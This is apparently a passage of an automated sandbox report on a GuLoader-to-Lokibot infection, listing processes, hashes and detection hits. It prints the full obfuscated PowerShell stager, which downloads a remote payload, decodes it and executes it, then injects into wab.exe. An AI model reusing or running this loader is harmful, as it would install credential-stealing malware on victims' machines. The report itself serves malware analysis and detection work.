forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:21:14:03
                                                                              Start date:18/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:21:14:05
                                                                              Start date:18/04/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
                                                                              Imagebase:0x7ff6cf150000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:21:14:13
                                                                              Start date:18/04/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
                                                                              Imagebase:0x130000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2541238211.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2532896490.00000000063BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2541730708.000000000AE11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:21:14:16
                                                                              Start date:18/04/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
                                                                              Imagebase:0x790000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:21:14:39
                                                                              Start date:18/04/2024
                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                              Imagebase:0x20000
                                                                              File size:516'608 bytes
                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:21:14:39
                                                                              Start date:18/04/2024
                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                              Imagebase:0x20000
                                                                              File size:516'608 bytes
                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Reset < >
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2717122532.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 66096ac6bc24ebd42c9ab2ba3ac83f6918529c7de15b60c219d6bd1efbf4df77
                                                                                • Instruction ID: d2940fade81ef536ed5bac7c52be5016f6a1ade65b9e9d703944bcfea9d95469
                                                                                • Opcode Fuzzy Hash: 66096ac6bc24ebd42c9ab2ba3ac83f6918529c7de15b60c219d6bd1efbf4df77
                                                                                • Instruction Fuzzy Hash: CEF1903091CA4D8FEBA8EF28CC557E937D1FF64350F14426AE84DC7292DB34A9458B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2717122532.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b56167569f329a055c487b73bcbed4d2bce35843c4718cf7feb25e800d58407a
                                                                                • Instruction ID: 4726bc42ee50e32fc0d8fe99ac64ae32b8c01c146662d3a2d13bcbc59eee8f41
                                                                                • Opcode Fuzzy Hash: b56167569f329a055c487b73bcbed4d2bce35843c4718cf7feb25e800d58407a
                                                                                • Instruction Fuzzy Hash: 4BE1B03090CA4E8FEBA8EF28D8557F977D1EB64750F14426ED84DC7291DF78A8408B85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2718111613.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 507b06885a8f682047db2de5c2c5e14dbddf38a1116ffe520d9ebd2aa25b92fc
                                                                                • Instruction ID: 80f343f6ddc0faa3380638ca1c7c60eaa8da589017632ca47868ff81139e2f44
                                                                                • Opcode Fuzzy Hash: 507b06885a8f682047db2de5c2c5e14dbddf38a1116ffe520d9ebd2aa25b92fc
                                                                                • Instruction Fuzzy Hash: 54E12631E0DACA8FEBA9EF2858565B57BE1FF55350F5801BAD40DC71E2EA2DE8418301
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2718111613.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e9998eb7ee43b69a1e413aff412920cce8dc11a39767b1b0cd42a88f24c5239b
                                                                                • Instruction ID: 8b528c83d2959e18e3df3a9733e3601741e2f7d85a19da0c0400005c203bfa2f
                                                                                • Opcode Fuzzy Hash: e9998eb7ee43b69a1e413aff412920cce8dc11a39767b1b0cd42a88f24c5239b
                                                                                • Instruction Fuzzy Hash: 60B13631E0DACA8FEBA5EF2C58566B57BE1EF55365B4801BAD00DCB193EE29DC018341
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2717122532.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dcfac055f61a71cdfdcb3dce81208bc4884375c649d87f85b5619f0dcbaf14bd
                                                                                • Instruction ID: 3800bf248ce4811ad1bcb68a5bb9e3056fe78fbf61362f3aea6116b7a8724b3d
                                                                                • Opcode Fuzzy Hash: dcfac055f61a71cdfdcb3dce81208bc4884375c649d87f85b5619f0dcbaf14bd
                                                                                • Instruction Fuzzy Hash: 82813970A1CA494FE798EB1CC485AB5B7E1FFA5391F10017ED08AC7296EA35F846C784
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2718111613.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 362e75a47970ccfca61dc76529a278b6e1e84a823543732190bc9ed13a78a559
                                                                                • Instruction ID: e71bf8c626e304f3067aded0554682469c2e069c0ec7e8d3a9db90dfdec32816
                                                                                • Opcode Fuzzy Hash: 362e75a47970ccfca61dc76529a278b6e1e84a823543732190bc9ed13a78a559
                                                                                • Instruction Fuzzy Hash: F041B331D1EACB8FEBA5EF28585617576E1FF553A1B9801BAD41CC71E2EE1DE8408301
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
